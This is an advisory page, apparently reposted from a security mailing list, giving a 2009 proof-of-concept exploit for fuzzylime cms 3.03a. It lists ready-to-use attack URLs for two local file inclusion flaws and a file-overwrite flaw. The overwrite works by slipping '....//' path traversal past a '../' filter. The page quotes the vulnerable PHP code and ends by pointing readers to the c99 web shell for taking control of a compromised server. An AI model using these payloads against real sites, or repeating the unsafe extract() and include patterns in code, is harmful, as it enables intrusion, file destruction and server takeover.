Computer Security

Security Advisory: fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities

  FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit

  CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities

From:ceza_fuat_kolik_(at)_hotmail.com <ceza_fuat_kolik_(at)_hotmail.com>
Date:22.06.2009
Subject:fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC

+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker |
+-----------+---------------------+
Author :  xhaxkerx
Special Thankz : yasin
site : http://www.c99.mobi
+---------------------------------+    


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
1. <?
2. @extract($HTTP_GET_VARS);  <-------- {1}
3. @extract($_GET);           <----------^
     
27.  elseif(isset($e)) { <------- {2}
28.       $filename = "code/mailing/$list.inc.php"; <------- {3}
29.        @include $filename; <------- {4}
-----------------------------------------------------------------
1. extract() allows to overwrite any not-defined variable via get  
  therefore it works regardless of register_globals settings.
      
2. $e is a variable not defined,therefore become $_GET['e']     
3. $list is a variable not defined,therefore become $_GET['list']
4. $filename contains $list variable that will be required
-----------------------------------------------------------------


[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
 1. <?
 2. $s = $_GET[s];
 3. $p = $_GET[p];
 4. $s = str_replace("../", "", $s); <---------- {1}
 5. $p = str_replace("../", "", $p);
...
54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.
htm"; <---- {2}
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
101.            if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
102.                    $output = ob_get_contents();
103.                    fputs($handle, $output);
104.
105.                    fclose($handle);
106.            }
107.    }
----------------------------------------------------------------------
1. you have to use ....// to change directory because of 1st point. so
  ....// will be ../
2. $cachefile contains $s variable
3. if $usecache == 1 we will go ahead
4. you will overwrite a file typing the name via $s variable.
-----------------------------------------------------------------------  
if you need shell http://www.c99.mobi/c99.txt


[x] http://www.youtube.com/watch?v=h3DQmJOkSY0
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru